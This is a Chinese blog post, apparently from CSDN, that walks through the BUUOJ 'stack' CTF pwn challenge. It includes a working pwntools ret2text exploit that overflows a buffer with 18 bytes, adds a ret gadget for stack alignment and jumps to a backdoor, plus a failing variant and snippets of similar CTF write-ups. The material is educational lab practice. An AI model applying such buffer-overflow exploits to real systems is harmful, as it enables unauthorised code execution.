buuoj [第六章 CTF之PWN章]stack

最新推荐文章于 2025-03-13 14:03:49 发布
最新推荐文章于 2025-03-13 14:03:49 发布
阅读量1.1k 收藏 2
点赞数 2
分类专栏: CTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yongbaoii/article/details/112857003
版权

ret2text

在这里插入图片描述习惯性查一下保护,啥也不是。

在这里插入图片描述很明显的栈溢出。
在这里插入图片描述很明显的shellcode

直接十八个字节再加上返回地址就有了。

exp

from pwn import*

r = remote('node3.buuoj.cn',27516)
#r = process('./stack')

context.log_level = "debug"

#gdb.attach(r)
system_addr = 0x400537
payload = 'a' * 18 + p64(0x40054e) + p64(system_addr)
r.sendline(payload)

r.interactive()

下面这个脚本是个错误示范。

from pwn import*

#r = remote('node3.buuoj.cn',27516)
r = process('./stack')

context.log_level = "debug"

#gdb.attach(r)
system_addr = 0x400537
payload = 'a' * 18 + p64(system_addr)
r.sendline(payload)

r.interactive()

它在本地能跑过,但是远程打不通,因为远程服务器要求有栈对齐,所以需要加一个ret句子滑一下。

171119 Pwn-StackSmash
whklhhhh的博客
11-24 1038
1625-5 王子昂 总结《2017年11月19日》 【连续第415天总结】 A. pwn-StackSmash B.原理当程序加了Cannary来保护时,栈溢出会使得程序异常终止并输出错误信息 StackSmash就是利用这个错误信息进行任意地址读取的 报错函数为__stack_chk_fail,代码如下:void __attribute__ ((noreturn)) __stack_c
南京邮电大学CTF-PWN-Stack Overflow
Ceciiiilia的博客
04-13 716
终于开始学pwn了…今天第一次做出来这题,记录一下。 1、首先放到ida里查看函数情况,发现了fgets()函数 2、双击A追踪,发现A的大小为0x28(0x0804A0A8 - 0x0804A080),并且栈位置的的高位处就是n,所以可以填充0x28个'A',来溢出到n的位置。 3、 from pwn import * #p = process('./cgpwna')#...
[BUUCTF-pwn]——[第六章 CTFPWN]stack
Y_peak的博客
03-12 864
[BUUCTF-pwn]——[第六章 CTFPWN]stack 题目地址: https://buuoj.cn/challenges#[%E7%AC%AC%E5%85%AD%E7%AB%A0%20CTF%E4%B9%8BPWN%E7%AB%A0]stack 思路 一个简单的栈溢出, 注意栈平衡就好 exploit from pwn import * p = remote('node3.buuoj.cn',25385) shell = 0x0000000000400537 ret = 0x0000000
【新手小白】CTF栈溢出原理及其应用(1)
最新发布
m0_66713779的博客
03-13 603
栈(Stack)是程序运行时用于存储局部变量、函数调用信息(如返回地址)等数据的内存区域。栈溢出是指当程序向栈中写入数据时,超出了预先分配的栈空间,导致覆盖了栈上的其他数据。因为在栈中,调用的局部变量stack指向的地址和返回地址是。如果stack溢出,多余的数据会覆盖返回地址。我们可以利用这一点特性,对程序注入攻击payload,达到劫持程序控制流的目的。
buuctf-N1Book[第六章 CTFPWN]
CHAWUCIREN1的博客
10-17 2442
64位,开启了NX保护 shift + F12查看里面的字符串 发现自带system和bin/sh的地址 bin_sh = 0x400537 gets函数对输入的长度没有限制 查看一下v1的栈空间 需要填充0xA + 0x8的空间 payload = “A” *(0xA + 8) 由于存在栈对齐,所以还要加一个地址 ret = 0x40054E 构造的exp如下 from pwn import * #p = process("./stack") p = remote("node4.buuoj..
pwn-stack-wp
diaojian3887的博客
08-29 231
stack2 知识点:数组溢出 正文 程序拖入IDA进行反编译,查看逻辑。 既然发现了溢出点,那么就是确定我们的ret地址和数组第一位数据的距离问题。我们使用gdb进行动态调试。 在0x0804884D进行下断点。我们根据选项去更改数组中第一位的数据。得到数组起始地址为0xffffcef8。 找到起始地址之后,我们去寻找执行ret指令时,栈的地址然后求其差值即可。...
pwn学习笔记之stack
m0_68956519的博客
02-25 817
之后caller函数调用结束,并继续调用下一个函数还记得最开始讲的cpu存储访问顺序吗?如果我们可以在一些危险函数get(),或者没有严格限制的read函数输入超过对应地址存储量的字符串,就可以覆盖掉返回地址,在函数调用结束时,返回地址就会被送入eip寄存器中,从而我们能够执行我们想要的动作。系统栈是由高地址往低地址增长的, 而数据的写入(局部变量)是按低地址到高地址的顺序写入. 如果程序没有对输入的字符数量做出限制, 就存在数据溢出当前栈帧以及覆盖返回地址的可能, 从而实现控制程序的执行流.
CTF Blind pwn题型学习笔记
lifanxin的博客
08-31 2284
Blind pwn概述如何辨别漏洞类型逻辑漏洞盲打格式化字符串盲打原理阐述例题讲解axb_2019_fmt32栈溢出盲打堆盲打总结 概述   所谓Blind pwn,即是在无法获得二进制程序文件的情况下对题目进行漏洞利用。这篇博客主要是将见到过的盲打pwn题做一个总结,大概可以分为以下几类盲打pwn题:逻辑漏洞盲打、格式化字符串盲打、栈溢出盲打、堆盲打。 如何辨别漏洞类型   对于盲打题,首先第一步应该是判断属于哪种类型的盲打,判断的步骤也很简单,nc连上后,直接看程序提供的菜单功能。   一般来说,需要逻
CTF——PWN——栈溢出(3.Easy_ShellCode)
qq_45215609的博客
09-18 816
CTF——PWN——栈溢出(3.Easy_ShellCode),bss段上的ret2shellcode
CG-CTF Stack Overflow(pwn
苗_的博客
02-24 808
首先先拿到ida里面看一下,找一下溢出点 点进去A发现是一个大小为40的数组(0x28),但是可以接受64个字符,所以这里是第一个溢出点。 下面是对s进行输入,限制是n,点开n会发现n就在A的下面。 所以思路就是:我们可以通过溢出A来达到覆盖n的效果 然后我们点开pwnme函数会发现system函数,搜索字符串发现没有‘/bin/sh’,所以需要我们自己写入bss段。 exp: f...
CTF比赛PWN题sgtlibc通用快速解题框架
serfend's blog
07-07 1811
开源地址:https://github.com/serfend/sgtlibc使用 安装pwn解题框架例题:buuctf start system_bss_binsh_direct_x64 shellcode_orw_x86 例题:buuctf pwnable_orw libc-leak_x86_puts 例题:ctfshow ret2libc_64 内部赛_签到题 libc-leak_x86_write_pure 例题:buuctf jarvisoj_level1 libc-leak_x86_writ
pwnstack2
醉等佳人归
09-07 436
1.题目 1.保护机制 开了canary和nx 2.题目 简单来说就是一个计算器,支持以下功能: 2.思路 重点1:问题出在第三个功能上,第三个功能是支持修改数组中的元素的,但函数没有进行index判断,导致我们通过这个偏移写任意数据到任意偏移地址,即可以覆盖函数返回地址 重点2:程序中给了一个后门函数,但是运行后发现没有/bin/bash,所以我们要自己调用system,参数的话直接使用/bin/bash中的sh即可 from pwn import * context(arch="i386",os=
pwn stack2
weixin_45677731的博客
03-15 217
拖进32位ida 大致分析一波,这个程序就是你可以往这里面存一些数字,然后选择展示数字,增加数字等操作,这题我又学到了一个新的较为隐蔽的漏洞:数组溢出 看这里,当我们选择3,add number选项时,虽然v13数组定义的是100个,但是对v5没有任何的检测,这样一来,我们就能修改任意一个数字,包括100个开外的数据,我们可以利用这一点,改变返回地址等参数 这里的hackhere是用不了的,...
PWN入门&Protostar靶场Stack系列
永远都没有了
01-24 1394
pwn入门靶场笔记
CG-CTF Stack Overflow
weixin_43464124的博客
05-11 862
为了上800分也是够了… 题目地址:pwn 看了几篇wp,觉得写得总是差那么一丢丢意思 首先检查溢出点 通过双击A可以看到,A这个数组的大小为40 但其可以接受64个字符的大小 所以这是第一个溢出点 然后往下看 虽然明面上显示的是输入s是有限制的 限制为n 但是当我们双击n的时候会发现 n就在A的下面 因此我们可以通过A来溢出到n 在函数列表中我们可以看到有一个函数 名字叫做pwnme 这部明...
ctf 堆栈结构
qq_69100706的博客
08-12 498
CTF(Capture The Flag)竞赛中,理解堆栈结构对于解决涉及二进制分析、逆向工程和利用开发的挑战至关重要。堆栈是在程序执行过程中用于临时存储数据和管理函数调用的关键数据结构。
pwn做题笔记13-stack2(以字节形式构造栈帧内容)
qq_40923256的博客
05-16 237
以字节形式构造栈帧内容,以及利用plt表和程序字符串构造返回地址(简单的ROP)
攻防世界 PWN 高手进阶 stack2 (write up)
qq_44768749的博客
08-18 586
攻防世界 PWN 高手进阶 stack2 (write up)stack20x01 查看保护机制0x02 查看反汇编0x03 利用过程修改返回地为system地址设置system函数的参数为'sh'exp stack2 该题利用未对数组边界进行检查,从而可以实现栈溢出 0x01 查看保护机制 32位 开启NX和canary 无PIE 0x02 查看反汇编 int __cdecl main(int argc, const char **argv, const char **envp) { int
buuoj [第六章 CTFPWN]ROP
yongbaoii的博客
01-28 1118
ret2libc 保护。 啥没有。 直接就溢出了,但是没后门函数,就通过puts函数泄露puts函数地址,计算libc基地址,找到system函数与’/bin/sh’, 然后一把梭就好。 需要用到gadget。 exp
ctf pwn数据库
03-10
### CTF PWN 类别数据库资源与题目 #### 关于CTF中的PWN挑战及其资源获取途径 在CTF(Capture The Flag)竞赛中,PWN类别主要涉及利用程序漏洞来获得控制权或者敏感信息。这类比赛通常围绕二进制可执行文件展开,...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值